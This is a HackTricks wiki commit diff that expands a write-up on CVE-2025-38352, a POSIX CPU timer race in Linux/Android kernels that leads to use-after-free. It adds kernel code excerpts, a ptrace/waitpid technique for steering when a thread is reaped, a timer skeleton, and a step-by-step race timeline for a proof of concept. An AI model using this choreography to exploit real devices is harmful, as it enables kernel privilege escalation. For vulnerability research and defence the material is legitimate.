Merge pull request #1706 from HackTricks-wiki/update_CVE-2025-38352___In-the-wild_Android_Kernel_Vulner_20251222_130353

carlospolop · web-flow · commit a807923846bc · 2025-12-29T12:08:54.000+01:00
CVE-2025-38352 – In-the-wild Android Kernel Vulnerability An...
diff --git a/src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md b/src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
@@ -80,6 +80,9 @@ Two expiry-processing modes
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
 
+<details>
+<summary>Task_work vs IRQ expiry paths</summary>
+
 ```c
 void run_posix_cpu_timers(void) {
     struct task_struct *tsk = current;
@@ -100,8 +103,13 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
 #endif
 ```
 
+</details>
+
 In the IRQ-context path, the firing list is processed outside sighand
 
+<details>
+<summary>IRQ-context delivery loop</summary>
+
 ```c
 static void handle_posix_cpu_timers(struct task_struct *tsk) {
     struct k_itimer *timer, *next; unsigned long flags, start;
@@ -126,6 +134,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
 }
 ```
 
+</details>
+
 Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
 Preconditions
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
 4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
 5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.
 
+### How release_task() and timer_delete() free firing timers
+Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU is still holding pointers to the timer object:
+
+```c
+static void __exit_signal(struct task_struct *tsk)
+{
+    struct sighand_struct *sighand = lock_task_sighand(tsk, NULL);
+    // ... signal cleanup elided ...
+    tsk->sighand = NULL;             // makes future lock_task_sighand() fail
+    unlock_task_sighand(tsk, NULL);
+}
+```
+
+With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:
+
+```c
+static int posix_cpu_timer_del(struct k_itimer *timer)
+{
+    struct sighand_struct *sighand = lock_task_sighand(p, &flags);
+    if (unlikely(!sighand))
+        goto out;                   // ret stays 0 -> userland sees success
+    // ... normal unlink path ...
+}
+```
+
+```c
+SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
+{
+    if (timer_delete_hook(timer) == TIMER_RETRY)
+        timer = timer_wait_running(timer, &flags);
+    posix_timer_unhash_and_free(timer);            // call_rcu(k_itimer_rcu_free)
+    return 0;
+}
+```
+
+Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.
+
+### Steering reaping with ptrace + waitpid
+The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For ptraced threads, `autoreap = do_notify_parent()` remains false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():
+
+- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
+- Parent issues `ptrace(PTRACE_ATTACH, tid)` and later `waitpid(tid, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
+- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.
+
+This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.
+
 Why TASK_WORK mode is safe by design
 - With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
 - Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
@@ -159,7 +215,18 @@ Impact
 
 Triggering the bug (safe, reproducible conditions)
 Build/config
-- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.
+- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:
+
+```c
+config POSIX_CPU_TIMERS_TASK_WORK
+    bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
+    depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
+    default y
+```
+
+This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.
+
+- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.
 
 Runtime strategy
 - Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {
 
 - Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().
 
-Detection and hardening
-- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
-- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
+### Practical PoC orchestration
+#### Thread & IPC choreography
+A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
+
+#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
+The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop ensure that `exit_notify()` sets `EXIT_ZOMBIE` while the timer is just about to fire:
+
+<details>
+<summary>Minimal per-thread CPU timer skeleton</summary>
+
+```c
+static timer_t timer;
+static long wait_time = 250000; // nanoseconds of CPU time
+
+static void timer_fire(sigval_t unused) {
+    puts("timer fired");
+}
+
+static void *worker(void *arg) {
+    struct sigevent sev = {0};
+    sev.sigev_notify = SIGEV_THREAD;
+    sev.sigev_notify_function = timer_fire;
+    timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
+
+    struct itimerspec ts = {
+        .it_interval = {0, 0},
+        .it_value    = {0, wait_time},
+    };
+
+    pthread_barrier_wait(&barrier);  // released by child main after ptrace attach
+    timer_settime(timer, 0, &ts, NULL);
+
+    for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
+    return NULL;                                 // do_exit() keeps burning CPU
+}
+```
+
+</details>
+
+#### Race timeline
+1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
+2. Parent `PTRACE_ATTACH`es, waits in `waitpid(__WALL)`, then `PTRACE_CONT` to let the worker run and exit.
+3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
+4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
+5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.
+
+#### Optional kernel instrumentation
+For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `tsk->comm == "SLOWME"` widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.
+
+### Instrumentation cues during exploitation
+- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
+- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.
 
 Audit hotspots (for reviewers)
 - update_process_times() → run_posix_cpu_timers() (IRQ)
@@ -209,5 +325,8 @@ Notes for exploitation research
 - [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
 - [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
 - [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
+- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
+- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
+- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)
 
 {{#include ../../../banners/hacktricks-training.md}}